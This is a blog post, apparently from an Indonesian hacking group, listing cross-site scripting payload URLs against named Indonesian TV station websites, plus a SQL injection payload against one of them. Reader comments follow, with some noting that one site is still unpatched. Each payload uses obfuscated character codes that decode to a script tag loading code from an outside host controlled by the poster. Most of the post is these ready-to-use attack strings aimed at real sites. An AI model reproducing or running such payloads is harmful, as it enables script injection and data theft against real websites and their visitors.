XSS On Indo TV Stations

Posted by: Joy  :  Category: Vulnerability
Bookmark and Share

XSSEDHere, we’re gonna show you XSS (Cross Site Scripting) and XFS (XSS From SQLi) bugs on some Indo TV Stations Websites.

As you might already know that Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which allow code injection by malicious web users into the web pages viewed by other users. Examples of such code include HTML code and client-side scripts. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy. Vulnerabilities of this kind have been exploited to craft powerful phishing attacks and browser exploits. As of 2007, cross-site scripting carried out on websites were roughly 80% of all documented security vulnerabilities. Often during an attack everything looks fine to the end-user who may be subject to unauthorized access, theft of sensitive data, and financial loss (Taken from wikipedia).

Here are some examples of their vulnerable URL :

= TransTV =

http://transtv.co.id/200706/sinopsispers.asp (Patched)

http://transtv.co.id/200706/programs.asp?aboutus=%22%3E%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115, 99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122, 121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34, 62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= SCTV =

http://sctv.co.id/search.php?s=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode(60,115,99,114,105, 112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97, 118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62))%3C/script%3E

= Indosiar =

http://indosiar.com/search?doSearch=true&qword=%3Cscript id=CrazydaVinci%3Edocument.write(String.fromCharCode (60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114, 97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104, 112,34,62,60,47,115,99,114,105,112,116,62))%3C/script%3E

= GlobalTV =

http://globaltv.co.id/v2/index.php?r=c2VhcmNoLnBocA%3D%3D&kw= %3Cscript%3Edocument.write%28String.fromCharCode%2860,115,99,114, 105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100, 97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47, 115,99,114,105,112,116,62%29%29%3C/script%3E

= TVRI =

http://tvri.co.id/detail_galeri.php?id=24%27%3Cscript id=CrazydaVinci%3Edocument.write%28String.fromCharCode %2860,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,99, 114,97,122,121,100,97,118,105,110,99,105,46,110,101,116,47,120,115,115,46,112, 104,112,34,62,60,47,115,99,114,105,112,116,62%29%29%3C/script%3E

= ANTV =

This is the worst among them, their site are vulnerable to XSS and SQL injection. But, as the topic in this post is only about XSS, we will only show you the XFS (XSS From SQLi) on their site :
http://an.tv/s/?sid=null+union+select+char%2860,115,99,114,105,112,116,32,115, 114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100,97,118,105,110,99, 105,46,110,101,116,47,120,115,115,46,112,104,112,34,62,60,47,115,99,114,105, 112,116,62%29,0–-

Let’s make indonesian sites better. ;)


12 Responses to “XSS On Indo TV Stations”

Pages: « 1 [2] Show All

  1. 3
    Black Shell Says:

    Om joy emang mantabzz dah,,,
    hahahaha

  2. 4
    Rio Says:

    Weits, UNBELIEVABLE i ♥ Mr.Joy :)

  3. 5
    Rio Says:

    Mr.Joy i want to know the latest XSS on FS comment, huhu Thank Alot, can you pass (menenbus) it? he

    offttopic? FS nya suspend knp bang?huhu

  4. 6
    heri Says:

    om cemana sih buat wibset kayak gini……..
    bagus banget…….

  5. 7
    Joy Says:

    @rio
    comment linker? sorry to say that for our safety, even it’s available or not, no more comment linker on public. ah yes :D my profile was suspended because of the no_one widget v2, i’m more into fb now ;)

    @heri
    ini basenya wordpress bro heri, tinggal ditweak aja.. :)

  6. 8
    kopies Says:

    mantab bro..

    minta ajarin yang FB dunk. ahhahaa.
    uda ada email ak tuh. heheh.

  7. 9
    ĦęRяŷüńţĩţĿēđź® ⋋⏝⋌ ĽőÞĥĻĩÞĥĽüÞĥĬЬĻĩźĦ Says:

    yg antv udh di patch ea?

  8. 10
    Joy Says:

    terakhir cek sih belum. skrg connection timed out. ada msalah x sama host nya…

  9. 11
    Arturo Revard Says:

    You guys did really a great work here, I’m astunished to see the quality, site bookmarked, thanks to the Admins

  10. 12
    HeRry Says:

    wkwkwkwk trnyt msh bsa yg di antv, awet bgt ea :D

Pages: « 1 [2] Show All

Leave a Reply